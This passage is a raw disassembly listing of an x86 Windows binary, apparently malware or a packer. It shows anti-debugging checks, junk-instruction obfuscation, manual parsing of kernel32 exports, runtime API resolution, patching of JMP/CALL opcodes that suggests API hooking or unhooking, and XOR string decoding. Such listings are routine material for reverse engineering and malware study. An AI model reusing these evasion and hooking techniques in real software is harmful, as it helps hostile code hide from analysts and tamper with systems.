cmp byte ptr [eax+edx], 2
jnz short loc_402830
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 2
jnz short loc_402830
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp eax, 0E8h
jz short loc_4027DB
cmp eax, 0E9h
jnz short loc_402830
loc_4027DB: ; CODE XREF: sub_40256D+265�j
call sub_40C5D8 ; IsDebuggerPresent
mov eax, [ebp+arg_4]
or edx, 0FFFFFFFFh
mov ecx, [ebp+arg_8]
lea ecx, [eax+ecx+5]
add ecx, ebx
sub ecx, 4
sub edx, ecx
add edx, eax
mov eax, edx
sub eax, 4
mov [ebp+var_C], eax
mov byte ptr [ebp+var_6+1], 0F7h
movzx eax, byte ptr [ebp+var_6+1]
imul eax, 4580h
mov byte ptr [ebp+var_6+1], al
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
add eax, ebx
sub eax, 4
mov edx, [ebp+var_C]
mov ds:1[eax], edx
mov eax, dword_43D11A
mov [ebp+var_10], eax
loc_402830: ; CODE XREF: sub_40256D+22E�j
; sub_40256D+23B�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 1
jnz short loc_4028A7
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 1
jnz short loc_4028A7
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 1
jnz short loc_4028A7
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 1
jnz short loc_4028A7
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp al, 3Dh
jz short loc_402873
cmp eax, 0FEh
jz short loc_402873
cmp eax, 0FFh
jnz short loc_4028A7
loc_402873: ; CODE XREF: sub_40256D+2F6�j
; sub_40256D+2FD�j
lea edi, [ebp+var_10]
lea esi, aYmSu_ ; "ym SU _"
movsd
movsd
call sub_40C4B8 ; GetCurrentProcessId
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_8]
lea edi, [edi+esi+5]
add edi, ebx
sub edi, 4
mov ds:1[edi], eax
mov dword ptr [ebp-8], 50AFh
sub dword ptr [ebp-8], 199Ch
loc_4028A7: ; CODE XREF: sub_40256D+2CA�j
; sub_40256D+2D3�j ...
inc ebx
cmp ebx, 400h
jb loc_402589
loc_4028B4: ; CODE XREF: sub_40256D+70�j
pop edi
pop esi
pop ebx
leave
retn
sub_40256D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028B9 proc near ; CODE XREF: sub_402AD6+7DC�p
var_36 = byte ptr -36h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_26 = byte ptr -26h
var_20 = dword ptr -20h
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
lea edi, [ebp+var_26]
lea esi, aB_hir ; "b_HiR"
mov ecx, 3
rep movsw
mov [ebp+var_11], 93h
movzx eax, [ebp+var_11]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_11], al
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_402922
; ---------------------------------------------------------------------------
loc_4028EC: ; CODE XREF: sub_4028B9+74�j
lea edi, [ebp+var_36]
lea esi, aNTe ; "$n*-TE "
movsd
movsd
xor ebx, ebx
jmp short loc_402905
; ---------------------------------------------------------------------------
loc_4028FB: ; CODE XREF: sub_4028B9+52�j
mov eax, [ebp+var_4]
cmp byte ptr [eax+ebx], 0
jnz short loc_40290D
inc ebx
loc_402905: ; CODE XREF: sub_4028B9+40�j
cmp ebx, 3E8h
jbe short loc_4028FB
loc_40290D: ; CODE XREF: sub_4028B9+49�j
call sub_40C4C4 ; GetCurrentThreadId
cmp ebx, 3E8h
jnb short loc_402934
call sub_40C4C4 ; GetCurrentThreadId
inc [ebp+var_4]
loc_402922: ; CODE XREF: sub_4028B9+31�j
mov eax, [ebp+arg_4]
sub eax, 3E8h
cmp [ebp+var_4], eax
jbe short loc_4028EC
jmp loc_402AD1
; ---------------------------------------------------------------------------
loc_402934: ; CODE XREF: sub_4028B9+5F�j
add [ebp+var_4], 0Ah
movzx edi, [ebp+arg_8]
shl edi, 2
mov ebx, ds:dword_40F1A0[edi]
and [ebp+var_8], 0
loc_40294A: ; CODE XREF: sub_4028B9+15D�j
mov eax, ebx
add eax, [ebp+var_8]
push eax
call sub_401D0D
pop ecx
call sub_40C4B8 ; GetCurrentProcessId
mov eax, [ebp+var_8]
movzx eax, byte ptr [ebx+eax]
cmp eax, 0E8h
jz short loc_402999
cmp eax, 0E9h
jz short loc_402999
call sub_40C548 ; GetTickCount
and [ebp+var_C], 0
jmp short loc_40298D
; ---------------------------------------------------------------------------
loc_40297B: ; CODE XREF: sub_4028B9+DC�j
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov cl, [ebx+eax]
mov [edx+eax], cl
inc [ebp+var_C]
loc_40298D: ; CODE XREF: sub_4028B9+C0�j
mov eax, ds:dword_40DFD4
cmp [ebp+var_C], eax
jb short loc_40297B
jmp short loc_402A0A
; ---------------------------------------------------------------------------
loc_402999: ; CODE XREF: sub_4028B9+AE�j
; sub_4028B9+B5�j
mov [ebp+var_30], 0EFEh
movzx eax, [ebp+var_30]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_30], ax
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
mov cl, [ebx+eax]
mov [edx+eax], cl
call sub_40C4B8 ; GetCurrentProcessId
mov eax, [ebp+var_8]
lea eax, [ebx+eax+1]
mov eax, [eax]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
mov edx, [ebp+var_10]
mov ecx, [ebp+var_4]
add ecx, eax
sub edx, ecx
mov ecx, ebx
add ecx, eax
mov eax, edx
add eax, ecx
mov [ebp+var_2C], eax
call sub_40C4B8 ; GetCurrentProcessId
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
lea eax, [eax+edx+1]
mov edx, [ebp+var_2C]
mov [eax], edx
mov [ebp+var_32], 750h
movzx eax, [ebp+var_32]
imul eax, 53B6h
mov [ebp+var_32], ax
loc_402A0A: ; CODE XREF: sub_4028B9+DE�j
mov eax, ds:dword_40DFD4
add [ebp+var_8], eax
cmp [ebp+var_8], 5
jb loc_40294A
mov eax, [ebp+var_8]
or edx, 0FFFFFFFFh
mov ecx, [ebp+var_4]
add ecx, eax
sub edx, ecx
mov ecx, ebx
add ecx, eax
mov eax, edx
add eax, ecx
sub eax, 4
mov [ebp+var_10], eax
mov [ebp+var_18], 43B1h
mov eax, 2A11h
mul [ebp+var_18]
mov [ebp-34h], eax
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
mov byte ptr [edx+eax], 0E9h
mov [ebp+var_12], 2Ah
movzx eax, [ebp+var_12]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_12], al
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
lea eax, [eax+edx+1]
mov edx, [ebp+var_10]
mov [eax], edx
or eax, 0FFFFFFFFh
sub eax, ebx
mov edx, [ebp+var_4]
mov ecx, [ebp+var_8]
lea edx, [edx+ecx+5]
add eax, edx
sub eax, 4
mov [ebp+var_10], eax
mov [ebp+var_19], 5Ah
sub [ebp+var_19], 46h
mov byte ptr [ebx], 0E9h
mov [ebp+var_20], 3FA7h
add [ebp+var_20], 498Fh
mov ds:1[ebx], eax
mov ax, word_43D134
mov [ebp+var_2E], ax
push ecx
push [ebp+var_4]
movzx edi, [ebp+arg_8]
shl edi, 4
push off_43CE7C[edi]
call sub_40256D
add esp, 0Ch
loc_402AD1: ; CODE XREF: sub_4028B9+76�j
pop edi
pop esi
pop ebx
leave
retn
sub_4028B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402AD6 proc near ; CODE XREF: sub_40A74E+50E�p
var_258C = dword ptr -258Ch
var_2588 = dword ptr -2588h
var_2584 = dword ptr -2584h
var_2580 = dword ptr -2580h
var_257C = dword ptr -257Ch
var_21B2 = byte ptr -21B2h
var_21AE = word ptr -21AEh
var_21AC = byte ptr -21ACh
var_21A8 = dword ptr -21A8h
var_21A4 = dword ptr -21A4h
var_21A0 = byte ptr -21A0h
var_219F = byte ptr -219Fh
var_219C = dword ptr -219Ch
var_2197 = dword ptr -2197h
var_2190 = dword ptr -2190h
var_218A = word ptr -218Ah
var_2188 = dword ptr -2188h
var_2184 = dword ptr -2184h
var_2180 = byte ptr -2180h
var_207F = byte ptr -207Fh
var_207C = dword ptr -207Ch
var_2076 = dword ptr -2076h
var_2072 = byte ptr -2072h
var_206C = dword ptr -206Ch
var_2068 = dword ptr -2068h
var_2064 = dword ptr -2064h
var_2060 = dword ptr -2060h
var_205C = byte ptr -205Ch
var_205B = byte ptr -205Bh
var_205A = word ptr -205Ah
var_2058 = dword ptr -2058h
var_2054 = word ptr -2054h
var_2052 = byte ptr -2052h
var_2051 = byte ptr -2051h
var_2050 = byte ptr -2050h
var_204C = dword ptr -204Ch
var_2044 = dword ptr -2044h
var_2034 = dword ptr -2034h
var_2030 = dword ptr -2030h
var_202C = dword ptr -202Ch
var_2025 = byte ptr -2025h
var_2024 = dword ptr -2024h
var_2020 = dword ptr -2020h
var_101C = dword ptr -101Ch
var_1015 = byte ptr -1015h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
; FUNCTION CHUNK AT 00403047 SIZE 00000325 BYTES
push ebp
mov ebp, esp
mov eax, 258Ch
call sub_40C43C
push ebx
push esi
push edi
mov [ebp+var_2051], 2Ch
movzx eax, [ebp+var_2051]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2051], al
call sub_402246
mov [ebp+var_2025], 0
call sub_40C554 ; GetVersion
cmp eax, 80000000h
jnb short loc_402B1F
mov [ebp+var_2025], 1
loc_402B1F: ; CODE XREF: sub_402AD6+40�j
lea edi, [ebp-2071h]
lea esi, a_jyp ; ".jYP"
mov ecx, 5
rep movsb
mov [ebp+var_1015], 0
loc_402B39: ; CODE XREF: sub_402AD6+124�j
cmp [ebp+var_2025], 0
jnz short loc_402B56
movzx edi, [ebp+var_1015]
shl edi, 4
cmp byte_43CE80[edi], 1
jz short loc_402B73
loc_402B56: ; CODE XREF: sub_402AD6+6A�j
cmp [ebp+var_2025], 0
jz short loc_402B75
movzx edi, [ebp+var_1015]
shl edi, 4
cmp byte_43CE80[edi], 2
jnz short loc_402B75
loc_402B73: ; CODE XREF: sub_402AD6+7E�j
jmp short loc_402BE1
; ---------------------------------------------------------------------------
loc_402B75: ; CODE XREF: sub_402AD6+87�j
; sub_402AD6+9B�j
mov [ebp+var_2058], 21F9h
sub [ebp+var_2058], 391Ch
movzx edi, [ebp+var_1015]
mov esi, edi
shl esi, 4
push off_43CE78[esi]
call sub_40C5E4 ; LoadLibraryA
mov ds:dword_414FF0[edi*4], eax
mov eax, dword_43D13B
mov [ebp+var_2076+1], eax
movzx edi, [ebp+var_1015]
mov esi, edi
shl esi, 4
push off_43CE74[esi]
shl edi, 2
push ds:dword_414FF0[edi]
call sub_40C50C ; GetProcAddress
mov ds:dword_40F1A0[edi], eax
call sub_40C518 ; GetProcessHeap
loc_402BE1: ; CODE XREF: sub_402AD6:loc_402B73�j
add [ebp+var_1015], 1
movzx edi, [ebp+var_1015]
shl edi, 4
cmp off_43CE74[edi], 0
jnz loc_402B39
call sub_40C548 ; GetTickCount
mov [ebp+var_1015], 0
loc_402C0C: ; CODE XREF: sub_402AD6+86E�j
movzx edi, [ebp+var_1015]
shl edi, 2
cmp ds:dword_40F1A0[edi], 0
jz loc_40332B
mov [ebp+var_205A], 71F3h
movzx eax, [ebp+var_205A]
imul eax, 3ACFh
mov [ebp+var_205A], ax
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_414FF0[edi]
mov [ebp+var_2034], edi
cmp [ebp+var_2025], 0
jz loc_402EAA
call sub_40C4E8 ; RtlGetLastWin32Error
call sub_4022E4
mov [ebp+var_2030], eax
shr edi, 16h
shl edi, 16h
mov [ebp+var_8], edi
mov eax, edi
add eax, 400000h
mov [ebp+var_1014], eax
xor ebx, ebx
jmp short loc_402CE0
; ---------------------------------------------------------------------------
loc_402C8F: ; CODE XREF: sub_402AD6+213�j
mov [ebp+var_21A4], 4E7Eh
mov eax, 5D56h
mul [ebp+var_21A4]
mov [ebp+var_21A8], eax
mov [ebp+var_21A4], eax
mov eax, dword_43D004
add eax, 0FFFh
push eax
push [ebp+var_8]
call sub_40C5C0 ; IsBadReadPtr
mov [ebp+var_4], eax
xor [ebp+var_4], 1
shl [ebp+var_4], 2
mov edi, [ebp+var_4]
mov [ebp+ebx*4+var_1010], edi
inc ebx
add [ebp+var_8], 1000h
loc_402CE0: ; CODE XREF: sub_402AD6+1B7�j
mov eax, [ebp+var_1014]
cmp [ebp+var_8], eax
jbe short loc_402C8F
lea eax, [ebp+var_219F]
push eax
call sub_40C5A8 ; GlobalMemoryStatus
mov [ebp+var_21A0], 5
sub [ebp+var_21A0], 61h
and [ebp+var_101C], 0
jmp loc_402E0B
; ---------------------------------------------------------------------------
loc_402D11: ; CODE XREF: sub_402AD6+346�j
call sub_40C4B8 ; GetCurrentProcessId
push 0FFFFh
push [ebp+var_101C]
push [ebp+var_2030]
call sub_40247C
add esp, 0Ch
mov [ebp+var_C], eax
lea edi, [ebp+var_21AC]
lea esi, aV4r7 ; "= ;v4R7"
movsd
movsd
cmp [ebp+var_C], 0
jnz short loc_402D50
call sub_40C4C4 ; GetCurrentThreadId
jmp loc_402E01
; ---------------------------------------------------------------------------
loc_402D50: ; CODE XREF: sub_402AD6+26E�j
and [ebp+var_21A4], 0
loc_402D57: ; CODE XREF: sub_402AD6+850�j
mov eax, [ebp+var_21A4]
mov [ebp+var_8], eax
jmp loc_402DE6
; ---------------------------------------------------------------------------
loc_402D65: ; CODE XREF: sub_402AD6+317�j
call sub_40C554 ; GetVersion
xor ebx, ebx
loc_402D6C: ; CODE XREF: sub_402AD6+2D6�j
call sub_40C4B8 ; GetCurrentProcessId
mov edi, [ebp+var_8]
shr edi, 2
shl edi, 2
add edi, [ebp+var_C]
mov edi, [edi+ebx*4]
mov [ebp+var_4], edi
call sub_40C4C4 ; GetCurrentThreadId
and [ebp+var_4], 4
mov edi, [ebp+ebx*4+var_1010]
cmp [ebp+var_4], edi
jnz short loc_402DAE
mov ax, word_43D147
mov [ebp+var_21AE], ax
inc ebx
cmp ebx, 400h
jb short loc_402D6C
loc_402DAE: ; CODE XREF: sub_402AD6+2C0�j
cmp ebx, 3FFh
jb short loc_402DDF
lea edi, [ebp+var_21B2]
lea esi, aOx ; " ox $"
mov ecx, 3
rep movsw
mov eax, [ebp+var_8]
add eax, 1000h
mov [ebp+var_21A4], eax
call sub_40C4E8 ; RtlGetLastWin32Error
jmp short loc_402E37
; ---------------------------------------------------------------------------
loc_402DDF: ; CODE XREF: sub_402AD6+2DE�j
add [ebp+var_8], 1000h
loc_402DE6: ; CODE XREF: sub_402AD6+28A�j
cmp [ebp+var_8], 0F000h
jbe loc_402D65
push [ebp+var_C]
call sub_4024CB
pop ecx
call sub_40C554 ; GetVersion
loc_402E01: ; CODE XREF: sub_402AD6+275�j
add [ebp+var_101C], 10000h
loc_402E0B: ; CODE XREF: sub_402AD6+236�j
mov eax, [ebp+var_2197]
sub eax, 0FFFFh
cmp [ebp+var_101C], eax
jbe loc_402D11
push [ebp+var_2030]
call sub_40C530 ; CloseHandle
call sub_40C548 ; GetTickCount
jmp loc_40332B
; ---------------------------------------------------------------------------
loc_402E37: ; CODE XREF: sub_402AD6+307�j
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_40F1A0[edi]
mov [ebp+var_1014], edi
and [ebp+var_1014], 0
loc_402E55: ; CODE XREF: sub_402AD6+3D2�j
call sub_40C4E8 ; RtlGetLastWin32Error
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+var_8]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
mov esi, [esi+edi]
mov [ebp+edi+var_2020], esi
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+var_8]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
add edi, esi
or byte ptr [edi], 2
call sub_40C4C4 ; GetCurrentThreadId
inc [ebp+var_1014]
cmp [ebp+var_1014], 400h
jb short loc_402E55
loc_402EAA: ; CODE XREF: sub_402AD6+189�j
mov [ebp+var_205B], 0C1h
add [ebp+var_205B], 1
cmp [ebp+var_2025], 0
jnz loc_402F71
call sub_40C518 ; GetProcessHeap
push offset aKernel32_dll ; "kernel32.dll"
call sub_40C500 ; GetModuleHandleA
mov [ebp+var_2184], eax
call sub_40C554 ; GetVersion
mov eax, [ebp+var_2184]
mov edx, eax
add edx, ds:3Ch[eax]
mov [ebp+var_2190], edx
call sub_40C4E8 ; RtlGetLastWin32Error
mov eax, [ebp+var_2184]
mov edx, [ebp+var_2190]
add edx, 78h
add eax, [edx]
mov [ebp+var_2197+3], eax
call sub_40C548 ; GetTickCount
mov eax, [ebp+var_2184]
mov edx, [ebp+var_2197+3]
add edx, 1Ch
add eax, [edx]
mov [ebp-2198h], eax
call sub_40C518 ; GetProcessHeap
mov eax, [ebp+var_2184]
mov edx, [ebp-2198h]
add eax, [edx]
mov [ebp+var_219C], eax
mov [ebp+var_2188], 52D4h
sub [ebp+var_2188], 396h
mov [ebp+var_207C], eax
mov [ebp+var_218A], 422h
sub [ebp+var_218A], 65F5h
loc_402F71: ; CODE XREF: sub_402AD6+3E9�j
push 1Ch
lea eax, [ebp+var_2050]
push eax
call sub_40C644 ; RtlZeroMemory
mov [ebp+var_205C], 0BBh
sub [ebp+var_205C], 0A8h
mov eax, [ebp+var_2034]
mov [ebp+var_202C], eax
loc_402F99: ; CODE XREF: sub_402AD6+522�j
; sub_403010+32�j
push 1Ch
lea eax, [ebp+var_2050]
push eax
push [ebp+var_202C]
call sub_40C6A4 ; VirtualQuery
mov [ebp+var_2060], 111Ch
sub [ebp+var_2060], 6053h
mov eax, [ebp+var_2034]
cmp [ebp+var_204C], eax
jnz short loc_403047
mov [ebp+var_2064], 0F23h
inc [ebp+var_2064]
mov eax, [ebp+var_2044]
mov [ebp+var_2068], eax
add [ebp+var_202C], eax
cmp [ebp+var_2025], 0
jnz short loc_402F99
mov word ptr [ebp+var_2184+2], 29E8h ; DATA XREF: .data:loc_4403FA�r
; sub_44041D+8C�w ...
movzx eax, word ptr [ebp+var_2184+2] ; DATA XREF: .data:0043F455�r
; .data:loc_43F491�r ...
imul eax, 75BEh
sub_402AD6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403010 proc near ; DATA XREF: .data:0043F551�o
; sub_44041D+10�o
mov [ebp-2182h], ax
push 20060000h
push 0
mov edi, [ebp-2068h]
shr edi, 0Ch
push edi
mov edi, [ebp-2050h]
shr edi, 0Ch
push edi
push 1000Dh
call dword ptr [ebp-207Ch]
call sub_40C4E8 ; RtlGetLastWin32Error
jmp loc_402F99
sub_403010 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_402AD6
loc_403047: ; CODE XREF: sub_402AD6+4F7�j
movzx edi, [ebp+var_1015]
shl edi, 2
mov esi, [ebp+var_202C]
sub esi, [ebp+var_2034]
mov ds:dword_411780[edi], esi
call sub_40C554 ; GetVersion
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_40F1A0[edi]
mov [ebp+var_1014], edi
mov eax, dword_43D004
add eax, 0FFFh
push eax
push edi
call sub_40C5CC ; IsBadWritePtr
mov [ebp+var_206C], eax
mov [ebp+var_2052], 0CCh
movzx eax, [ebp+var_2052]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2052], al
cmp [ebp+var_206C], 0
jnz loc_4032BF
lea edi, [ebp+var_207F]
lea esi, aNb ; "Nb"
mov ecx, 3
rep movsb
cmp [ebp+arg_0], 0
jz loc_40329E
call sub_40C4C4 ; GetCurrentThreadId
mov eax, [ebp+var_1014]
movzx eax, byte ptr [eax]
cmp eax, 0E9h
jz short loc_403109
call sub_40C4C4 ; GetCurrentThreadId
cmp [ebp+arg_0], 1
jnz loc_40329E
call sub_40C5D8 ; IsDebuggerPresent
jmp loc_4032BF
; ---------------------------------------------------------------------------
loc_403109: ; CODE XREF: sub_402AD6+618�j
mov eax, [ebp+var_1014]
mov edx, ds:1[eax]
sub edx, 0FFFFFFFFh
lea eax, [edx+eax+4]
mov [ebp+var_2024], eax
call sub_40C518 ; GetProcessHeap
mov [ebp+var_2180], 0
loc_40312F: ; CODE XREF: sub_402AD6+714�j
sub [ebp+var_2024], 5
mov eax, [ebp+var_2024]
mov [ebp+var_4], eax
loc_40313F: ; CODE XREF: sub_402AD6+6A2�j
mov eax, [ebp+var_4]
mov edx, eax
dec edx
cmp byte ptr [edx], 0
jnz short loc_403170
mov edx, eax
sub edx, 2
cmp byte ptr [edx], 0
jnz short loc_403170
mov edx, eax
sub edx, 3
cmp byte ptr [edx], 0
jnz short loc_403170
mov edx, eax
sub edx, 4
cmp byte ptr [edx], 0
jnz short loc_403170
sub eax, 5
cmp byte ptr [eax], 0
jz short loc_40317A
loc_403170: ; CODE XREF: sub_402AD6+672�j
; sub_402AD6+67C�j ...
call sub_40C548 ; GetTickCount
dec [ebp+var_4]
jmp short loc_40313F
; ---------------------------------------------------------------------------
loc_40317A: ; CODE XREF: sub_402AD6+698�j
movzx edi, [ebp+var_2180]
shl edi, 2
mov esi, [ebp+var_4]
mov [ebp+edi+var_257C], esi
add [ebp+var_2180], 1
movzx eax, byte ptr [esi]
cmp eax, 0E9h
jnz short loc_4031EF
mov [ebp+var_2584], 7FD9h
mov eax, 5B51h
mul [ebp+var_2584]
mov [ebp+var_258C], eax
mov [ebp+var_2584], eax
mov eax, esi
mov edx, ds:1[eax]
sub edx, 0FFFFFFFFh
lea eax, [edx+eax+4]
mov [ebp+var_2024], eax
mov [ebp+var_2588], 7769h
sub [ebp+var_2588], 1231h
jmp loc_40312F
; ---------------------------------------------------------------------------
loc_4031EF: ; CODE XREF: sub_402AD6+6C7�j
mov ebx, [ebp+var_4]
jmp short loc_403225
; ---------------------------------------------------------------------------
loc_4031F4: ; CODE XREF: sub_402AD6+755�j
lea edi, [ebp+var_2588+2]
lea esi, aAa6 ; "/aa6"
mov ecx, 5
rep movsb
mov eax, [ebp+var_1014]
add eax, ebx
sub eax, [ebp+var_4]
mov dl, [ebx]
mov [eax], dl
mov byte ptr [ebp+var_2584+3], 0ABh
sub byte ptr [ebp+var_2584+3], 16h
inc ebx
loc_403225: ; CODE XREF: sub_402AD6+71C�j
cmp ebx, [ebp+var_2024]
jb short loc_4031F4
loc_40322D: ; CODE XREF: sub_402AD6+7BB�j
sub [ebp+var_2180], 1
movzx edi, [ebp+var_2180]
shl edi, 2
mov ebx, [ebp+edi+var_257C]
loc_403245: ; CODE XREF: sub_402AD6+7B0�j
mov byte ptr [ebx], 0
cmp byte ptr ds:1[ebx], 0
jnz short loc_40327A
cmp byte ptr ds:2[ebx], 0
jnz short loc_40327A
cmp byte ptr ds:3[ebx], 0
jnz short loc_40327A
cmp byte ptr ds:4[ebx], 0
jnz short loc_40327A
cmp byte ptr ds:5[ebx], 0
jz short loc_403288
loc_40327A: ; CODE XREF: sub_402AD6+77A�j
; sub_402AD6+784�j ...
mov eax, dword_43D157
mov [ebp+var_2580], eax
inc ebx
jmp short loc_403245
; ---------------------------------------------------------------------------
loc_403288: ; CODE XREF: sub_402AD6+7A2�j
movzx eax, [ebp+var_2180]
or eax, eax
jg short loc_40322D
call sub_40C5D8 ; IsDebuggerPresent
cmp [ebp+arg_0], 1
jz short loc_4032BF
loc_40329E: ; CODE XREF: sub_402AD6+5FF�j
; sub_402AD6+623�j
movzx eax, [ebp+var_1015]
push eax
push [ebp+var_202C]
push [ebp+var_2034]
call sub_4028B9
add esp, 0Ch
call sub_40C518 ; GetProcessHeap
loc_4032BF: ; CODE XREF: sub_402AD6+5E2�j
; sub_402AD6+62E�j ...
cmp [ebp+var_2025], 0
jz short loc_40332B
mov [ebp+var_2184], 666Ah
mov eax, 38EDh
mul [ebp+var_2184]
mov [ebp+var_2188], eax
mov [ebp+var_2184], eax
and [ebp+var_1014], 0
loc_4032F0: ; CODE XREF: sub_402AD6+849�j
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+var_8]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
mov edx, [ebp+edi+var_2020]
mov [esi+edi], edx
inc [ebp+var_1014]
cmp [ebp+var_1014], 400h
jb short loc_4032F0
call sub_40C4B8 ; GetCurrentProcessId
jmp loc_402D57
; ---------------------------------------------------------------------------
loc_40332B: ; CODE XREF: sub_402AD6+148�j
; sub_402AD6+35C�j ...
add [ebp+var_1015], 1
movzx edi, [ebp+var_1015]
shl edi, 4
cmp off_43CE74[edi], 0
jnz loc_402C0C
mov [ebp+var_2054], 2CB6h
movzx eax, [ebp+var_2054]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2054], ax
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_402AD6
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40336C proc near ; CODE XREF: sub_4034C6+6C�p
; sub_40355C+4C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 251h
push esi
push [ebp+arg_0]
mov eax, dword_43D164
lea eax, ds:41DA80h[eax]
push eax
call sub_40C998
add esp, 0Ch
mov [ebp+var_8], 38Ah
xor edi, edi
jmp short loc_4033B9
; ---------------------------------------------------------------------------
loc_4033A2: ; CODE XREF: sub_40336C+4F�j
mov eax, dword_43D164
add eax, edi
lea eax, ds:41DA80h[eax]
movsx edx, byte ptr [eax]
xor edx, 4
mov [eax], dl
inc edi
loc_4033B9: ; CODE XREF: sub_40336C+34�j
cmp edi, esi
jl short loc_4033A2
mov eax, dword_43D164
add eax, esi
mov byte ptr ds:dword_41DA80[eax], 0
mov edi, dword_43D164
mov eax, edi
add eax, 6
add eax, esi
mov dword_43D164, eax
cmp eax, 0DE4h
jle short loc_4033EC
and dword_43D164, 0
loc_4033EC: ; CODE XREF: sub_40336C+77�j
mov [ebp+var_C], 277h
lea eax, dword_41DA80[edi]
pop edi
pop esi
leave
retn
sub_40336C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033FD proc near ; CODE XREF: sub_4034C6+4F�p
; sub_40355C+35�p
var_15 = byte ptr -15h
var_10 = dword ptr -10h
var_9 = byte ptr -9
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov [ebp+var_8], 613Fh
movzx eax, [ebp+var_8]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_8], ax
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_403422: ; CODE XREF: sub_4033FD+2A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_403422
mov edi, eax
mov [ebp+var_6], di
mov [ebp+var_10], 2120h
add [ebp+var_10], 420Ah
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_40346B
; ---------------------------------------------------------------------------
loc_403447: ; CODE XREF: sub_4033FD+74�j
movzx eax, [ebp+var_2]
cmp byte ptr [ebx+eax], 5Ch
jnz short loc_403467
lea edi, [ebp+var_15]
lea esi, dword_43D168
mov ecx, 5
rep movsb
inc [ebp+var_2]
jmp short loc_403473
; ---------------------------------------------------------------------------
loc_403467: ; CODE XREF: sub_4033FD+52�j
dec [ebp+var_2]
loc_40346B: ; CODE XREF: sub_4033FD+48�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_403447
loc_403473: ; CODE XREF: sub_4033FD+68�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_4034B0
mov [ebp+var_4], 0
jmp short loc_40349E
; ---------------------------------------------------------------------------
loc_403485: ; CODE XREF: sub_4033FD+B1�j
movzx eax, [ebp+var_4]
mov edx, [ebp+arg_4]
movzx ecx, [ebp+var_2]
mov esi, eax
add esi, ecx
mov cl, [ebx+esi]
mov [edx+eax], cl
inc [ebp+var_4]
loc_40349E: ; CODE XREF: sub_4033FD+86�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_403485
loc_4034B0: ; CODE XREF: sub_4033FD+7E�j
mov [ebp+var_9], 7Dh
movzx eax, [ebp+var_9]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_9], al
pop edi
pop esi
pop ebx
leave
retn
sub_4033FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034C6 proc near ; CODE XREF: sub_403B8E+93�p
; sub_403D18+263�p ...
var_115 = byte ptr -115h
var_112 = byte ptr -112h
var_10B = byte ptr -10Bh
var_105 = byte ptr -105h
